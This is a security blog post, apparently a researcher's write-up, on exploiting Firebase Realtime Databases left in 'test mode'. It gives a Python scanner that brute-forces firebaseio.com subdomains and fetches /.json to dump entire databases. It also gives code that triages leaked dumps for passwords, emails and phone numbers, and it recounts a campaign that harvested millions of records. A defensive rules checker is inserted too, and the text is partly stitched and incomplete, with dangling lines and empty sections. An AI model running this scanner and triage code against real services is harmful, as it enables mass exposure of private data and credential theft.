Exploiting misconfigured Firebase Instances

Finding exposed Firebase databases is simple. Although the problem is well known, it is not obvious whether Google has added any further mitigation. UPDATE: the default "test mode" rules on newly created Firebase databases now expire after 30 days; databases created before this change are still affected. To put the severity in perspective, my team ran a 12-hour campaign and analyzed the data it surfaced: over 13,000,000 records, including emails, passwords, phone numbers and private messages, from more than 450 databases.

GasLeak is a very simple tool that abuses a feature of the Firebase Realtime Database. When creating a database the user is prompted to choose either "locked mode" or "test mode". "Locked mode" denies all reads and writes, while "test mode" allows anyone, authenticated or not, to read and write the whole database. A red warning is displayed while public read and write access is in effect.

When the user clicks "Dismiss" the warning goes away and seemingly never appears again. So when a developer finishes testing and moves to production, it is entirely up to them to remember that the database is still in test mode and to write real security rules. While this is no fault of Google's, it leaves a huge opening for attackers to capitalize on developers who forget.
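To make the difference between the two modes concrete, the following added example (not part of the original post or of GasLeak) sketches the rule sets in the Realtime Database rules language and a small checker that reports which paths are readable or writable without authentication. The rule sets are constructed for illustration; the expiring form uses a "now < <timestamp>" expression, and the rule that read access cascades from a node to its children is assumed from the rules language, so once a node is public its descendants are not reported separately.

```python
import re
from typing import Any, Dict, List

# Constructed rule sets (illustrative, not taken from any real project).
LOCKED_MODE = {"rules": {".read": False, ".write": False}}
TEST_MODE = {"rules": {".read": True, ".write": True}}
# Newer "test mode" rules expire: the literal is a millisecond timestamp.
TEST_MODE_EXPIRING = {"rules": {".read": "now < 1700000000000",
                                ".write": "now < 1700000000000"}}
# What a production rule set usually looks like: each user reads their own node.
PER_USER = {"rules": {"users": {"$uid": {".read": "$uid === auth.uid",
                                         ".write": "$uid === auth.uid"}}}}
# A locked root with one deliberately public subtree and one auth-gated subtree.
MIXED = {"rules": {".read": False,
                   "public": {".read": True},
                   "private": {".read": "auth != null"}}}

_EXPIRY = re.compile(r"^\s*now\s*<\s*(\d+)\s*$")


def rule_is_public(rule: Any, now_ms: int) -> bool:
    """True when a .read/.write rule grants access to unauthenticated callers.

    A literal true is public; an expiring "now < N" rule is public until N;
    False, a missing rule, or any other expression (auth.uid checks and the
    like) is treated as not public for the purposes of this scan."""
    if rule is True:
        return True
    if isinstance(rule, str):
        match = _EXPIRY.match(rule)
        if match:
            return now_ms < int(match.group(1))
    return False


def public_paths(ruleset: Dict[str, Any], now_ms: int, op: str = ".read") -> List[str]:
    """Return the shallowest paths whose `op` rule (".read" or ".write") is public.

    Rules cascade downward, so a public node makes its whole subtree public and
    the walk stops there; a child cannot take access back from its parent."""
    found: List[str] = []

    def walk(node: Dict[str, Any], path: str) -> None:
        if rule_is_public(node.get(op), now_ms):
            found.append(path or "/")
            return
        for key, child in node.items():
            if isinstance(child, dict):
                walk(child, f"{path}/{key}")

    walk(ruleset["rules"], "")
    return found


if __name__ == "__main__":
    now = 1_600_000_000_000  # constructed "current time" in ms, before the expiry above
    for name, rules in [("locked", LOCKED_MODE), ("test", TEST_MODE),
                        ("test-expiring", TEST_MODE_EXPIRING),
                        ("per-user", PER_USER), ("mixed", MIXED)]:
        print(f"{name:14s} public read: {public_paths(rules, now)}"
              f"  public write: {public_paths(rules, now, '.write')}")
```

Run against the expiring test-mode rules with a "now" before the timestamp, the checker reports the root as public; after the timestamp it reports nothing, which is exactly the 30-day behaviour described in the update above. The per-user rule set is the shape a developer should move to before dismissing the warning.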

Data is ordinarily read through the REST API by appending .json to a path, for example https://redacted.firebaseio.com/users.json, which returns the users node. That would seem to mean that even a publicly readable database requires brute-forcing node names. However, requesting the root with no path, https://redacted.firebaseio.com/.json, returns the entire database in one response, so no path brute-forcing is needed:


With that, all that remains is to brute-force database names, which are subdomains of firebaseio.com. My team ran a 12-hour campaign using a wordlist generated from the Alexa Top 1 Million. Example snippet:

import requests

def is_vulnerable(word):
    subdomain = word.rstrip()
    firebase_url = f"https://{subdomain}.firebaseio.com/.json"
    try:
        response = requests.get(firebase_url, timeout=10)
    except requests.RequestException:
        return False
    # 200 means the root node is world-readable. A locked database answers 401
    # ("Permission denied") and an unknown name 404. An open but empty database
    # returns 200 with the body "null", which leaks nothing, so exclude it.
    return response.status_code == 200 and response.text.strip() != "null"
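The status code alone tells you whether a name is worth keeping; the body of a 200 is what you end up sorting through. The following added example (not code from the original post or from GasLeak) classifies a response to GET /.json and then triages an open dump for the kinds of records the campaign turned up. The dump and the error bodies are constructed sample data; the assumption that a locked database answers 401 with {"error": "Permission denied"} and an unknown name 404 mirrors the Realtime Database REST API, and the email and phone patterns are deliberately loose heuristics.

```python
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# Constructed sample responses. The dump is invented, not a real leak.
OPEN_BODY = json.dumps({
    "users": {
        "u1": {"email": "alice@example.com", "password": "hunter2",
               "phone": "+15555550100"},
        "u2": {"email": "bob@example.com", "password": "letmein"},
    },
    "messages": {"m1": {"from": "u1", "to": "u2", "text": "see you at 5"}},
})
LOCKED_BODY = json.dumps({"error": "Permission denied"})  # assumed 401 body


def classify(status: int, body: str) -> str:
    """Map a GET /.json response to open / empty / locked / missing / other.

    A bare 200 is not enough: an existing database with nothing in it still
    answers 200, with the literal body "null"."""
    if status == 200:
        return "empty" if body.strip() == "null" else "open"
    if status == 401:
        return "locked"
    if status == 404:
        return "missing"
    return "other"


EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
PHONE = re.compile(r"^\+?\d[\d\s().-]{7,}\d$")
SECRET_KEYS = {"password", "passwd", "pwd", "secret", "token", "apikey", "api_key"}


def walk(node: Any, path: str = "") -> Iterator[Tuple[str, str, Any]]:
    """Yield (path, key, value) for every scalar leaf in a nested JSON dump."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}/{index}")
    else:
        yield path, path.rsplit("/", 1)[-1], node


def triage(body: str) -> Dict[str, int]:
    """Count sensitive-looking leaves in an open dump, by category.

    Key names win over value shape: a leaf under a key like "password" is a
    credential whatever it looks like; other string leaves are matched against
    the email and phone heuristics."""
    counts = {"email": 0, "password": 0, "phone": 0, "leaves": 0}
    for _path, key, value in walk(json.loads(body)):
        counts["leaves"] += 1
        if key.lower() in SECRET_KEYS:
            counts["password"] += 1
        elif isinstance(value, str) and EMAIL.match(value):
            counts["email"] += 1
        elif isinstance(value, str) and PHONE.match(value):
            counts["phone"] += 1
    return counts


def secret_paths(body: str) -> List[str]:
    """Paths of every leaf stored under a credential-like key, for reporting."""
    return sorted(path for path, key, _value in walk(json.loads(body))
                  if key.lower() in SECRET_KEYS)


if __name__ == "__main__":
    print(classify(200, OPEN_BODY), classify(200, "null"),
          classify(401, LOCKED_BODY), classify(404, ""))
    print(triage(OPEN_BODY))
    print(secret_paths(OPEN_BODY))
```

In practice you would feed classify() the status and text of the response returned by the fetch shown above and run triage() only on the bodies it marks open; the counts give you a quick sense of which of several hundred hits deserve a closer look first.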

Gigabytes of exposed databases were discovered, containing millions of lines of leaked credentials. Some of the more interesting finds are outlined below.

PAN numbers / passbooks

Phone call / transaction logs

At the bottom of four of these databases, it appears another researcher had already left a note of their own; test mode allows writes as well as reads.